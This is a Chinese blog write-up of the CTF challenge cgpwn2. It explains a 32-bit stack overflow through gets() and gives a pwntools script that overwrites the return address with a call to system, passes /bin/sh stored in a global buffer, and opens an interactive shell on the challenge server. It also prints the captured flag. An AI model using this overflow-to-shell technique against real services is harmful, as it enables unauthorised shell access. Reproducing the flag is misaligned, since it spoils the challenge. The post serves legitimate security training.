攻防世界-wp-PWN-新手区-6-cgpwn2

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量1.5k 收藏 1
点赞数 1
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45161658/article/details/114124491
版权

题目来源

CGCTF

题目描述

菜鸡认为自己需要一个字符串

题目场景

220.249.52.134:49499

题目附件

53c24fc5522e4a8ea2d9ad0577196b2f

题目思路:

题目给了pwn的函数是利用系统调用打印"hehehe",存在一个call system在0x0804855A,由于hello函数中的gets函数获取的字符串s没有输入字符数量的限制,直接栈溢出,将返回地址覆盖为call system,由于name在bss段中,地址固定不变,程序中调用了_system函数,但是没有/bin/sh,把name赋值为/bin/sh并且将其作为参数传给_system函数

解题过程:

拿到程序后,我们首先checksec一下,发现是32位小端序,保护开启了RELRO和NX,没有Stack和PIE,载入IDA,F5反编译得到伪C代码,进入hello函数:

char *hello(){
  char *v0; // eax
  signed int v1; // ebx
  unsigned int v2; // ecx
  char *v3; // eax
  char s; // [esp+12h] [ebp-26h]
  int v6; // [esp+14h] [ebp-24h]
......
  puts("please tell me your name");
  fgets(name, 0x32, stdin);
  puts("hello,you can leave some message here:");
  return gets(&s);
}

首先要求我们通过fgets函数输入一个名字,从键盘读取最多0x32个字符到name区域,然后提示我们通过gets函数输入一些信息,没有输入字符数量的限制

.bss:0804A080 name            db 34h dup(?)           ; DATA XREF: hello+77↑o

name是bss段的一个大小为34的区域,s区域的起始位置是距离栈底0x26个字节的地方,大小不限

-00000038 ;
......
-00000026 s               db ?
......
-00000001                 db ? ; undefined
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008
+00000008 ; end of stack variables

在左边的函数列表中,有一个叫做pwn的函数,在实际运行过程中并不会被调用,这个函数利用系统调用打印"hehehe",按下tab后按下空格可以看到在0804855A 有一个call _system

.text:0804854D pwn             proc near
.text:0804854D ; __unwind {
.text:0804854D                 push    ebp
.text:0804854E                 mov     ebp, esp
.text:08048550                 sub     esp, 18h        ; Integer Subtraction
.text:08048553                 mov     dword ptr [esp], offset command ; "echo hehehe"
.text:0804855A                 call    _system         ; Call Procedure
.text:0804855F                 nop                     ; No Operation
.text:08048560                 leave                   ; High Level Procedure Exit
.text:08048561                 retn                    ; Return Near from Procedure
.text:08048561 ; } // starts at 804854D
.text:08048561 pwn             endp

在hello函数中有一个部分用gets函数向栈的s区域读取了字符串,gets函数不限制字符数量程序并且没有开启stack保护,输入字符串覆盖栈上hello函数的返回地址,程序执行完hello函数之后返回到call _system这里,然后把name赋值为/bin/sh,最后把name也就是/bin/sh当参数传入system。

脚本:

from pwn import *
p = remote('220.249.52.134', 49499)
name=0x0804A080
callsystem=0x0804855A
parameter="/bin/sh"#参数
payload="A"*0x26+"a"*4+p32(callsystem)+p32(name)#26+4到达返回地址后依次传入call_system和name的地址
p.recvuntil("name")
p.sendline(parameter)
p.recvuntil("here:")
p.sendline(payload)
p.interactive()

cyberpeace{3e0e437f3c60f9d6ea2390df1e800233}

Scorpio-m7
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
PWN入门(练习课)
小心信科理化声
12-13 2035
经过前几期的讲解,是时候来做几个实战的题目来练习一下了~! 难度1: pwn1 老样子,先checksec一下。 可以看到这是一个32位的程序,并且开启了NX数据执行保护。 (本来以为这个题目时有些难度,或许得构造ROPchain)但是事实证明我想多了。 拖进IDA里面分析一下 主函数里只是调用了一下welcome函数 这里有个十分明显的getflag函数 我们先去main函数里看一下 好家伙,gets先生又出来演习了,可以看到buf只有14个长度 再看一下有没有可能直接去溢出到system函数里面
PWN入门
z190814412的博客
01-02 1654
调用函数入栈顺序 调用的参数、函数返回地址(eip)、调用函数的基地址(ebp)、局部变量 技术分类 修改返回地址,让其指向溢出数据中的一段指令(shellcode) 修改返回地址,让其指向内存中已有的某个函数(return2libc) 修改返回地址,让其指向内存中已有的一段指令(ROP) 修改某个被调用函数的地址,让其指向另一个函数(hijack GOT) Shellcode payload :...
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 501
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
pwn 入门基础
y0un9er
08-10 3739
简单介绍入门 pwn 所需要的基础知识,如:汇编、函数调用约定、常用工具等
PWN入门分享
CK_0ff的博客
02-08 9247
文章目录什么是PWNPWN的前置技能可执行文件常见漏洞基础环境环境配置步骤栈溢出漏洞栈函数调用栈ELF文件文件保护机制CanaryNXPIE(ASLR)RELROlinux内存布局结语 pwn基础入门分享 什么是PWN? 以下内容摘自百度百科: ”Pwn”是一个黑客语法的俚语词,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵了 。 ​ PWN也可译为二进制漏洞挖掘,在CTF比赛中,PWN题的目标是拿到flag,一般是在l
pwn零基础入门
weixin_45948183的博客
03-24 1万+
pwn零基础入门 很多初学者在初学pwn的时候,对pwn可能存在许多疑问,学什么,怎么学,今天和大家分享一下刚学pwn的一些资料的学习历程。 首先分享一下pwn的一系列学习资料 一、首先语言基础得打牢,1、汇编语言,《汇编语言—王爽》2、编程语言(C语言和python)C语言必须要会,题目大部分是用C语言写的,而且很多那些知识都要读libc的源代码。会python,exp用python写的,CTF...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
开关电源的PWN-PFM控制电路
12-09
开关电源的PWN-PFM控制电路 邹怀安 张 锐 胡荣强 武汉理工大学自动化学院 1.引言 开关电源由于在体积、重量、效率和可靠性等多多方面的优势,目前在计算机、通信、家用电器、雷达、空间技术等众多领域中已完全取代...
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门和PWN的学习,是入门指导。
pwn学习入门详解PPT
04-17
包括Windows内核学习,格式化字符串,栈溢出等方面
PWN入门(1)基础知识和环境设置
Ba1_Ma0的博客
09-07 4395
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
从零开始入门pwn(一):pwn的介绍以及部分前置知识
热门推荐
m0_51466347的博客
12-06 4万+
目录 一.前言 二.pwn的介绍 pwn的定义 pwn的题目模式 前置知识 一.Linux 二.C语言 三.汇编语言 四.计算机组成原理 三.总结 一.前言 本人凭着一腔热血想要入门pwn,但却被pwn的高入门门槛泼了一次又一次冷水,趁着自己还记得,写一点心得为后来想入门的跟我一样的零基础新手提供一些帮助。 二.pwn的介绍 pwn的定义 想必很多想要入门的新手都已经通过各种各样的入门文章或视频了解了pwn的定义以及方向,但出于礼貌,我在这里还是再重复一下下。...
Nepire的pwn入门学习之旅——(一)
Nepire的博客
02-03 2146
欢迎大家来到Nepire的pwn入门,本系列主要是通过CTF中pwn题的各种类型的解题过程来学习pwn相关的知识,让我们在pwn世界沦陷吧呜喵~ 这次我要讲的是南邮CTF里的pwn50—When did you born?这是我最初做出来的几题pwn之一,算是很基础的pwn题,,所以让我们从这题开始入门吧~ 题目 nc ctf.acdxvfsvd.net 1926 ...
全网最硬核PWN入门_图解分析
个人笔记
04-03 6289
PWN序Linux环境下的基础知识从C源码到可执行文件的生成过程程序的编译与链接什么是可执行文件可执行文件分类PE/ELFELF文件格式分节和段的存储域加载ELF / 查看节和段分布命令段(segment)与节(section)程序数据在内存中的组织分布大端序与小端序存储关键寄存器静态链接与动态链接常用汇编指令intel 和 AT&T汇编格式 序 PWN知识只有不断的重复,实践才能熟悉掌握。以下知识点以LINUX系统环境下为主要说明(Windows的会有点别)。 Linux环境下的基础知识
[PWN][基础篇]基础理论
网络安全知识分享
03-19 4963
[PWN][基础篇]基础理论1、相关知识2、栈帧 1、相关知识 溢出概念:在计算机中,当要表示的数据超出计算机所使用的的数据表示范围时,产生了数据的溢出 产生的原因: 1、使用了非类型安全的语言 比如C和C++ 2、用不可靠的方式存取或者复制内存缓存 3、编译器设置的内存缓冲靠太近关键数据结构 PWN的概念:“呯!!!” 指的是攻破设备或者系统。 PWN常用的寄存器,ESP,EBP,EIP ESP:栈顶指针,在push和pop时会有变化 EBP:栈底指针,用来索引确定函数参数或者局部变量的位置(经常访
功防世界-pwn-新手练习(更新中)
Sea_Sand息禅
04-02 927
1、CGfsb:https://blog.csdn.net/zz_Caleb/article/details/88980866 2、when_did_you_born(简单的ROP) 下载文件,是一个64位的elf文件,放到ida中看伪码,报错: 搜了一下这个问题,是栈的问题,可以通过修改一些设置来解决,但是,找到了main函数: 在这个地方查看伪码不会报错,而且主函数的源码可以得到:...
攻防世界pwn-forgot
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Scorpio-m7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值